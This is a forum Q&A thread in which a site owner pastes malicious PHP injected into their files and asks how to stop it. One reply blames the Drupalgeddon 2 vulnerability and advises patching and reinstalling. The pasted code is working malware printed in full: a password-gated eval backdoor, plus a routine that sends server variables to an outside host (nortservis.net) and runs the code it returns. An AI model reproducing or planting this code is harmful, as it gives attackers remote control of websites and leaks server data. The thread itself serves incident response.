Block injection hacker

Question

I have someone injecting my php files with the following code:

if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { 

eval(base64_decode($_POST["cookies_p"])); }
if (strpos($_SERVER['REQUEST_URI'], "post_render" ) !== false) { $patchedfv = "GHKASMVG"; }
if( isset( $_REQUEST['fdgdfgvv'] ) ) { if(md5($_REQUEST['fdgdfgvv']) === "93ad003d7fc57aae938ba483a65ddf6d") { $patchedfv = "SDFDFSDF"; } }

if($patchedfv === "GHKASMVG" ) { @ob_end_clean();  die;  }

if (strpos($_SERVER["HTTP_USER_AGENT"], "Win" ) === false) { $kjdke_c = 1; }
error_reporting(0);
if(!$kjdke_c) { global $kjdke_c; $kjdke_c = 1;
global $include_test; $include_test = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS", "WordPress");
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )))
{}
else
{
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
                        'timeout' => '15',
                        'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                        'method' => 'POST',
                        'content' => "REM_REM='1'".$data_nfdh
)));
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("condtions","2",time()+172800); } else { echo "<script>document.cookie='condtions=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
}

}

I blocked the nortservis.net in /etc/hosts. I disabled allow-php-url-fopen. I have fail2ban on the server but it's not catching this. What can I do?

Answer 1

I have experienced the same problem as you a couple of weeks ago: the php files in my server were injected with exactly the same code.

In my case, I found out that my Drupal site was not up to date and was exploited by the vulnerability known as Druppalgeddon 2 (aka SA-CORE-2018-002), which was used to fiddle with my system and inject this php. Given the seriousness of the vulnerability, I wiped out my server and reinstalled it all (lesson learned: keep your system up to date!).

If you have Drupal, verify that your version is up to date and not vulnerable to SA-CORE-2018-002. Exploit of the vulnerability may appear as a suspicious POST record in your access logs.